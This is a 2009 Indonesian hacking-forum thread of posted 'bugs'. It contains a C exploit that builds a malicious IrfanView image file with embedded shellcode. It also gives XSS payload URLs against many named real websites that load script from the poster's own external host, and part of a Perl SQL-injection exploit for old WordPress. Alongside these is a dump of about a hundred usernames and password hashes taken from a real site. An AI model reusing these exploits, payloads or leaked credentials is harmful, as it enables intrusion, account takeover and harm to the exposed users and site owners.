Kumpulan Bugs

Digital Cat · Post by **Digital Cat** » Wed Jul 22, 2009 3:19 pm

Irfan View 3.99 >> Local Stack Buffer Overflow

shellcode : metasploit

#include <stdio.h>
#include <stdlib.h>

#define SF "RO.iff"
#define OFFSET 2100

 char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";

char iff1[]=
"\x46\x4F\x52\x4D\x00\x01\x0B\x7E\x49\x4C\x42\x4D\x42\x4D\x48\x44"
"\x00\x00\x00\x14\x01\xFD\x01\xB6\x00\x00\x00\x00\x08\x00\x01\x00"
"\x00\x00\xC7\xC7\x01\xFD\x01\xB6\x43\x4D\x41\x50\x00\x00\x0C\x00"
"\x1B\x1B\x19\xFF\xFF\xFF\xBC\xD7\xEA\xEF\x64\x2E\x73\xA9\xD2\xD9"
"\xD9\xD9\x13\x6E\xB6\x00\x68\xB4\x70\x70\x70\xF0\x92\x6C\x2E\xCC"
"\xCC\xFA\xF2\xE6\x99\x99\x99\x50\x94\xC5\xF1\xE9\xE6\xF7\xAD\x32"
"\xAC\xB4\xB4\x4D\x4B\x48\xF0\xC9\xB4\xAB\x85\x38\xE0\xE9\xEF\xEC"
"\xE5\xDE\xEF\xB4\x98\x2E\x80\xBC\xE5\x98\x3A\x8C\x8C\x8C\xEF\xE0"
"\xD3\xA6\xC4\xD9\x33\x33\x33\x8C\xB6\xD5\xC6\xD5\xDD\xFA\xF7\xF3"
"\xFE\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x03\xFB\xEF\x3F\x78"
"\xE8\xFF\x00\xF8\xDF\x00\x03\x04\x10\x40\x41\xE7\x00\xEB\x00\x00"
"\xC0\xF4\x00\x01\x41\x56\xE7\x00\xDF\x00\x03\x04\x30\x40\xC7\xE7"
"\x00\xEA\x00\x00\x18\xF7\x00\x03\x03\xE0\x80\x5E\xE7\x00\xC1\x00"
"\xC1\x00\xC1\x00\xEB\xFF\x01\x7F\xE7\xF7\xFF\x03\xFC\xA7\x7E\x72"
"\xE8\xFF\x00\xF8\xDD\x00\x01\x01\x64\xE7\x00\xDF\x00\x00\x01\xFF"
"\x00\x01\x60\x80\xE8\x00\xEB\x00\x00\x80\xF6\x00\x03\x05\xC8\x81"
"\x6E\xE7\x00\xEB\x00\x01\x40\x10\xF7\x00\x03\x04\xA0\x40\x72\xE7"
"\x00\xC1\x00\xC1\x00\xC1\x00\xEB\xFF\x01\x3F\x87\xFF\xFF\x00\xDD"
"\xFC\xFF\x05\xEF\xF7\xFF\xE7\x9E\x66\xE8\xFF\x00\xF8\xEA\x00\x04"
"\x60\x00\xA0\x22\x01\xFE\x00\x07\x20\x50\x08\x00\x10\x01\x09\x80"
"\xE8\x00\xEC\x00\x05\x01\x20\x69\x80\xE0\x63\xFF\x03\x04\x01\x80"
"\x60\x70\x18\xFE\x00\x01\xA8\x80\xE8\x00\xEA\x00\x04\x68\x00\xA0"
"\x22\x01\xFE\x00\x07\x20\x50\x08\x04\x14\xA1\x89\x80\xE8\x00\xEC"
"\x00\x05\x01\x00\x18\x80\xA0\x40\xFF\x01\x09\x00\x80\x20\x40\x00"
"\x06\x04\x80\xA0\x80\xE8\x00\xC1\x00\xC1\x00\xC1\x00\xEC\xFF\x10"
"\xFE\x3F\x81\x7E\x4D\x97\x38\x73\xB9\xFA\x4F\x2F\xD3\xFF\xF1\x0E"
"\x67\xE8\xFF\x00\xF8\xEA\x00\x00\x04\xFF\x02\x00\x08\xFF\x00\x08"
"\x40\x00\x01\x00\x02\x00\x0A\x01\x60\xE7\x00\xEB\x00\x0F\x02\x4A"
"\xA2\xA0\x48\xC3\x04\x02\x20\xA1\x54\x2A\x00\x02\x20\xF0\xE7\x00"
"\xEC\x00\x10\x01\xC0\xCE\x83\xB2\xC8\xC7\x0C\x42\x00\xA1\xD0\x6E"
"\x04\x0A\xF1\xF8\xE7\x00\xEB\x00\x05\x23\xFB\xC2\xE1\xE7\x83\xFF"
"\x87\x07\xC7\xF1\x78\x7A\x06\x00\x20\xF0\xE7\x00\xC1\x00\xC1\x41";

 char iff2[]=
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x48";

 char iff3[]=
 "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41";

 int main()
{
	FILE* k;
	char *buffer;
	int offset=0;
	unsigned int retaddress=0x7C8369F0;
    buffer=(char *)malloc(OFFSET+sizeof(iff2)+sizeof(iff2)+sizeof(iff3))+4+1;
    
     if((k=fopen(SF,"wb"))==NULL)
   { printf("error"); exit(0); } 

	memcpy(buffer,iff1,sizeof(iff1));
	offset=sizeof(iff1);
	memcpy(buffer+offset,iff2,sizeof(iff2)); 		
    offset+=sizeof(iff2);
	memcpy(buffer+offset,iff3,sizeof(iff3));
	offset+=sizeof(iff3);
	offset=0;
	offset=OFFSET;
	memcpy(buffer+offset,&retaddress,4);
	offset+=4;
	memcpy(buffer+offset,shellcode,sizeof(shellcode));
	fwrite( buffer, 1,sizeof(iff2)+sizeof(iff2)+sizeof(iff3)+1, k );
   fclose(k);
	return 0;	
}

Terima Kasihâ€¦.

Digital Cat · Post by **Digital Cat** » Thu Jul 23, 2009 4:04 pm

Bugs : sugababes.com

web Site / Link : http://sugababes.com/show-detail.php?id=27

Detail :

Code: Select all

Server = Apache/2.2.0 (Fedora)
    Version = 4.1.12
    Powered by = PHP/5.1.2
    Current User = sugababes@vv44web01
    Current Database = sugababes
    Supports Union = yes
    Union Columns = 8

Table : phpbb_users

Code: Select all

    phpbb_users
    diary
    news

Kolom : Table phpbb_users

Code: Select all

    username
    user_email
    user_icq
    user_id
    user_level
    user_password

Table : phpbb_users
username:user_password:

Code: Select all

mrs t:2d3a3249cdc7b4663db44d4ca8252d75:
Dannie Boy:182a1e726ac1c8ae851194cea6df0393:
Blazin Babe:4914964d52599ee3e77d68d578572c37:
orli:ffb4a4d0940fde9b0d2d7e9ea0017140:
Gunnar is goood:854694dc83b7fc6650f62fdbff1a52e6:
MissMisr:25d55ad283aa400af464c76d713c07ad:
ange2003:f9e1f3ae15198f819fbc3449479401bf:
Saltybabe:2507490e53b252c2f593ee4e9da9129e:
Leon_da_sexgod:f30532000a806003ddd6aa7771223b03:
KiraKatz:95884b5232ea01d055768613fc84f242:
tarynma:08017f86d47d1b641716b14e4c48ff35:
pinkky_1:d5df69da529ce3b838a5e0e0780a086e:
sugababe91:7fde47bf866ce9a846dc6d3ba7383049:
James Dean:8e3df1a989428ff469c83a35884bd4a1:
Regan:c0f800d7ffe20d4e44225275e68fda56:
qwertqwert:a384b6463fc216a5f8ecb6670f86456a:
beep:5f4dcc3b5aa765d61d8327deb882cf99:
butcher:c58498c44c94dcdaab1d75b1f4688707:
giomla:e2818f83e17dc0d8cba0bc156a8fb3ea:
Peter_p:e7efda40b1c94805070cd9bf9638ae27:
=: Roy :=:84e6c0471bc15c3a3a03153c6d28d047:
joker666:1b1c2ebe17e9f81469f267672e60933f:
Jack Daniel:0911054d8ad47cc256400031197f3e97:
minisimsam:f01e0d7992a3b7748538d02291b0beae:
SHREK:1a909a26169c230d006cb464fbbb35a3:
Millie:c51e7a23a59ef8d76892f207b517eaf0:
rich345:e7f4f8bd246c235418280d1f124e14f0:
Powerpuff_girl1:babc2860c134a097abd7b53f2a2a4193:
Miss Naughty:5d41402abc4b2a76b9719d911017c592:
jdauris:098796e75f06a07b6562d28805973870:
rem:5cadb523cb6909f92350f70f124adfb8:
Goro FL:00bfc8c729f5d4d529a412b12c58ddd2:
egla:7563df3e9a39d05bf34f33ca66c0e7b3:
keisha2003:29ddc288099264c17b07baf44d3f0adc:
Jckie:3d1e3077753f8fb768794c6a8331c493:
sexy-angel:d73686beae2b4fc74f8769280c94b46b:
threeb:32f6ede63b1ebcf1a9cb25edf5124e9c:
Steph 2003:57c7c2ddc26eb099d164044b1517c365:
nabel:d98c2a265e34013a60c84e8fb30f22ca:
js003e5537-4:47bc17dc1a2f164967f55325d866c75c:
jpaterson:3c268f9e57f72a904c02b735f357b761:
husky13:67afc88feaaa65c73fce9f79669a2127:
moehrle:3f42d55a1cccf1d96eb5a8e4c14ce4e4:
baby_blue:153a4b0a56d423c73a3c5c6f30a5e24e:
lori_1:3a9fa4655e6acd4ad1da3a5bc23f09a5:
dellihc:5e0fb1614a5f8e9ee42ba106302bb045:
sugarandspice5:aa6e1bacb3bedfec8b52420c1a8a6f51:
jdl87:08eccfc22ca5791286ebb537e0f15b8c:
katforsythe:275639052a9aa011ec2b3eba62c9aba3:
hannahgosney:198a8c20a31ae4fb9271efe60075609a:
JENNA  ANNABLE:6db38c85b66a565321f93357ff04fbdf:
harpreet:81a7b0619dde6aa8963033d7e34f3afb:
sugaboi:757550ecd97318ce9a1867bb96d026e5:
Summersmum:d39e7f80a9e4b67eebf53ca8410ee3ff:
dollars:ed7a163e90e0a798e145c8300cb582b8:
Derek L.Newman:439fd05bb7ff01f7673b2b073a1a4c4b:
guyperry:1174889cb6243d80d886eed8b8100a7c:
head_like:2a826adaf6e46ec11bab6f85f9402c53:
hazie:6de25a89f67a276da5f911ed789d0290:
clickrick:96468a0a3afaa8df9f9ac31cb94dbded:
gatouss:4a158576ff6319c86298de8203a7d159:
rxy230189:5eefc3c511dfcdf141d56678074b87a9:
lis:dc5a4e9caf9a70b6fe736090eb2016d8:
dimian:74cc8956e5a3ce87100f2f58e1396feb:
sjynstree:9103fb99bafb48705b35aabf0ceb1636:
RachHeidi:ad2106f2e4b616a289079eeb6a275d23:
bastardo:436dc8ee5312315758115fff0bc3a341:
sk8er_girl:d7428a7f7fbc8abb1df0d32507cc1565:
broxi:1174889cb6243d80d886eed8b8100a7c:
Jeshua:ce0e0023456351a42753a8094d7e5f0f:
adam lee:f8b13e38e26fc267b26f0c903b3f9f23:
suga_ellen:15cfacecb094e41225286428a49de010:
goovenon:bdf76bdd545feac99d636d011b81dc1d:
BrideMC:e1c565c5b1da2a3b81712427d06f5b34:
timducky:1e4ba061f03738f6350ce94051619d6c:
Littledevil_02:73ebfd0f8a23f0348989b520f2f41caa:
sweden_babe:21f9f292ef3f52e4d6aac3497ca1bb1d:
SassieSugababe:9d6f0e7faa62a99f5e5d4ea6e9d73666:
Burner2106:6b600db7ebc902f84a89ba680117975c:
nanamew:b9bf9b80051834fc8f6e9c20247cc282:
jopaton:613fbbc60d27e1aada1422d0ef3b27a2:
Molly Jean:a0bb756fef4053e66efd7a0629f562c7:
pasjekoel:ac0a8261e48b485b1a5ac98066ba2578:
bruttan:05b972dcf28374406d13e879724bfe3b:
Napp:301d43950a0f573f236a39038be71fe6:
bartkenter:fe86b268f412e57f83fcfd2b5561eac1:
Hugh:71fb1571844dff3db77ec2d950288b1b:
missismusic:fabb1d474de552e8301d8f5f7e637ef8:
dale:5f3c73f334928ade199125381f726892:
Kriz:b5f87a623929fd3b5ac265c888f1a215:
leezy87:8bc5b3285e2ac74b93c3ea6d7b0511d9:
reyon:757550ecd97318ce9a1867bb96d026e5:
Lobbie:9c10669263dac342426c90e0d711ef66:
edel:1038def6221874fb7208dff6349c21ef:
loopylass123:3fcf9ae132977f7ad2d4c9c58abffad0:
lees_babe:6988ec3aba1eaddf2435141bf10487ca:
Doll:73ebfd0f8a23f0348989b520f2f41caa:
MissBurnzzz:2b1b3eb12b8be71ecf1c42366a6c84da:
eb001d0067:e68b2892860a18086483cc1e4d0089e9:
kacklea:f78f2477e949bee2d12a2c540fb6084f:

Terima Kasih...

Digital Cat · Post by **Digital Cat** » Thu Jul 23, 2009 4:42 pm

Bugs : Yahoo Mexico

>> Lihat Lebih Jelas <<

Lihat Web Site :

[url=htpp://%20http://mx.autos.yahoo.com/]>> Klik untuk melihat Web Site Victim <<[/url]

Bugs terdapat pada link di yahoo

Kode :

Code: Select all

http://mx.autos.yahoo.com/newcars/index.php?

Tampilannya :

>> Lihat Lebih Jelas <<

Lihat Tampilan Bugs : >> Klik untuk melihat tampilannya <<

Terima Kasih...

Digital Cat · Post by **Digital Cat** » Thu Jul 23, 2009 5:46 pm

Bugs : www.re.camcom.it Camera di Commercio Reggio Emilia

Link : RicercaView.jsp

>> Klik untuk lihat lebih jelas <<

Tampilan Bugs :

>> Klik untuk lihat lebih jelas <<

Lihat Tampilannya :

>> Klik Lihat Tampilannya <<

Terima Kasih...

Digital Cat · Post by **Digital Cat** » Thu Jul 23, 2009 6:36 pm

Bugs : latest.php

Tampilan :

Web Site : www.scodz.com

Link : /dstats/twatch/latest.php

>> Klik untuk lihat gambar lebih jelas <<

Lihat Tampilan Web Site Bugs :

>> Klik untuk melihat Web Site Bugs <<

Selain link diatas terdapat juga pada link di bawah ini :

Code: Select all

www.scodz.com/dstats/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.rakosszentmihaly.hu/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.araburban.net/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.pragmatick.de/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.ealmahd.gov.sa/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

bulwindoors.com/~bulwindo/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.brandongevallen.nl/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.plan.sk/www-plan-stats/TraceWatch/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

path3.ca/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

park.zc.bz/02/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.strzelecki.org/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.judohk.cz/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

micromin.net/test/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.fantasyservice.com.ar/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.fjear.nl/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.eisenbahnen.at/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.chiroinzet.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.ggmc.org/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.willemsena.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.willemsenzwembaden.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.andrewillemsen.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

walden3.kr/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

Terima Kasih...

JokerKliker · Post by **JokerKliker** » Fri Jul 24, 2009 4:41 pm

Waduh, sangar-sangar banget nih...

Digital Cat · Post by **Digital Cat** » Fri Jul 24, 2009 5:14 pm

JokerKliker wrote:Waduh, sangar-sangar banget nih...

gak juga sih..

menurut saya biasa aja..

para master disini lebih hebat ..

saya hanya mencari kelemahan yang mungkin bisa dilakukan itu saja..

Terima Kasih.......

Digital Cat · Post by **Digital Cat** » Fri Jul 24, 2009 6:52 pm

WordPress <= 1.5.1.1 "cat_id" Remote SQL Injection Exploit

Code: Select all

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;
use Digest::MD5 qw(md5_hex);
getopts('h:p:');

$path = $opt_h;
$pref = $opt_p || 'wp_';

if(!$path) { usage(); }

$xpl = LWP::UserAgent->new() or die;
&header();
print " +---

    * STEP 1 - TRY GET ADMIN INFO\n";

$reg = $path;
$reg .= '?%63%61%74=%36%36%36%20%75%6E%69%6F%6E%20%73%65%6
C%65%63%74%20%36%36%36%2C%63%6F%6E'.
'%63%61%74%28%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29
%2C%75%73%65%72%5F%6C%6F%67%69'.
'%6E%2C%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75
%73%65%72%5F%70%61%73%73%2C%63'.
'%68%61%72%28%35%38%2C%35%38%2C%35%38%29%29%2C%6E%75%6C
%6C%2C%6E%75%6C%6C%2C%6E%75%6C'.
'%6C%20%66%72%6F%6D%20'.$pref.'%75%73%65%72%73%20%57%48%45%
52%45%20%49%44=1'; ### 1 - admin ID
$res = $xpl->get($reg);
die "ERROR : ", $res->status_line unless $res->is_success;
